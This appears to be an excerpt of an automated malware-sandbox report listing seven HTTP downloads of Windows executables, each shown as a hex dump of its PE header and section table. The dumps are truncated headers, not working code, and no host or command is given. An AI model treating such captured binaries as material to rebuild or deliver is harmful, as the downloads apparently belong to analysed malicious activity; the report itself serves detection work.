Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 10 Nov 2024 03:55:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 10 Nov 2024 03:55:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 10 Nov 2024 03:55:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 10 Nov 2024 03:55:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 10 Nov 2024 03:55:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 10 Nov 2024 03:55:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 10 Nov 2024 03:55:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
